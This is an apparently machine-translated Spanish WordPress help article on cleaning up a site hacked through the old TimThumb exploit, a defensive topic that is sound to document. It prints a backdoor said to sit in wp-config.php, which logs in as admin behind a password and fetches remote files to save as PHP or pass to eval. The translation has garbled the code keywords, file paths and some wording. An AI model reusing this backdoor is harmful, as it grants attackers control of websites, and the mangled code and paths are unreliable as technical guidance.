Entonces, si recuerda correctamente, hubo un problema de seguridad con el script TimThumb en agosto que se solucionó. Sin embargo, aún para nuestra sorpresa, muchos sitios todavía usan la versión anterior. Hemos arreglado tres sitios hasta ahora en el último mes, uno fue ayer. Por lo tanto, tiene sentido escribir un artículo paso a paso, para que nuestros usuarios puedan seguirlo. Los tres usuarios para los que estamos arreglando esto ni siquiera sabían qué era TimThumb o si lo estaban usando o no. TimThumb es un script PHP que cambia el tamaño de las imágenes. Había una vulnerabilidad en él, pero ahora es SEGURO usarlo. Entonces, ¿cómo sabe que su sitio ha sido pirateado? Si ve una gran pantalla roja en su navegador cuando visita su sitio:
Si comienza a ser bombardeado con correos electrónicos que dicen que los usuarios están siendo redirigidos desde su sitio. Lo más probable es que su sitio haya sido víctima de este exploit. Como precaución, todo el mundo debería utilizar este escáner de vulnerabilidades de Timthumb. Esto le dirá si está utilizando la versión anterior de TimThumb. Muchos clubes temáticos mejoraron inmediatamente su núcleo. Por lo tanto, este complemento verificará si está instalada la nueva versión segura de Timthumb o si está instalada una versión anterior. Ahora, si su sitio ha sido víctima de este exploit de Timthumb antes, esto es lo que debe hacer. Primero debe eliminar los siguientes archivos: /wp-admin/upd.php /wp-content/upd.php Inicie sesión en el panel de administración de WordPress y reinstale su versión de WordPress. Estamos buscando específicamente reinstalar estos archivos: /wp-settings.php /wp-includes/js/jquery/jquery.js /wp-includes/js/110n.js Luego abra su wp-config.php donde probablemente encontrará este gran código malicioso que recopila credenciales de inicio de sesión y cookies. Este código estará inactivo. si (isset ($ _ GET[‘pingnow’]) && isset ($ _ OBTENER[‘pass’])) {if ($ _GET[‘pass’] == ’19ca14e7ea6328a42e0eb13d585e4c22′) {if ($ _GET[‘pingnow’]== ‘iniciar sesión’) {$ user_login = ‘admin’; $ usuario = get_userdatabylogin ($ user_login); $ user_id = $ usuario-> ID; wp_set_current_user ($ user_id, $ user_login); wp_set_auth_cookie ($ id_usuario); do_action (‘wp_login’, $ user_login); } si (($ _GET[‘pingnow’]== ‘exec’) && (isset ($ _ GET[‘file’]))) {$ ch = curl_init ($ _ OBTENER[‘file’]); $ fnm = md5 (rand (0.100)). ‘. php ‘; $ fp = fopen ($ fnm, «w»); curl_setopt ($ ch, CURLOPT_FILE, $ fp); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); curl_exec ($ ch); curl_close ($ ch); fclose ($ fp); eco ««;} if (($ _GET[‘pingnow’]== ‘eval’) && (isset ($ _ OBTENER[‘file’]))) {$ ch = curl_init ($ _ OBTENER[‘file’]); curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, verdadero); curl_setopt ($ ch, CURLOPT_HEADER, 0); curl_setopt ($ ch, CURLOPT_TIMEOUT, 5); $ re = curl_exec ($ ch); curl_close ($ ch); eval ($ re); }}} En su carpeta de temas, busque dónde la secuencia de comandos TimThumb puede almacenar los archivos en caché. Por lo general, se encuentran en esta estructura: / wp-content / themes / themename / scripts / cache / external_ DanemarkMD5Hash rire.php / wp-content / themes / themename / temp / cache / external_ DanemarkMD5Hashacée.php Elimina todo lo que se parezca a esto. Si no está seguro, elimine todo lo que no sea un archivo de imagen. Lo siguiente que debe hacer es reemplazar timthumb.php con la última versión que se puede encontrar en http://timthumb.googlecode.com/svn/trunk/timthumb.php Ahora sería una buena idea cambiar su contraseña de palabras comenzando con sus datos de inicio de sesión de MySQL hasta sus datos de inicio de sesión de WordPress. Recuerde cambiar la contraseña de MySQL en wp-config.php o aparecerá la pantalla «Error al establecer la conexión». Edite las claves secretas en su archivo wp-config.php. Puede generar una nueva clave yendo al generador en línea. Ahora has terminado. Recuerde vaciar todos los complementos de almacenamiento en caché de páginas. Como precaución, también es una buena idea vaciar la caché y las cookies de su navegador. Para los desarrolladores, intente usar la función Tamaños de imagen adicionales de WordPress para reemplazar las funciones de Timthumb. Háganos saber si necesita más ayuda mediante nuestro formulario de contacto.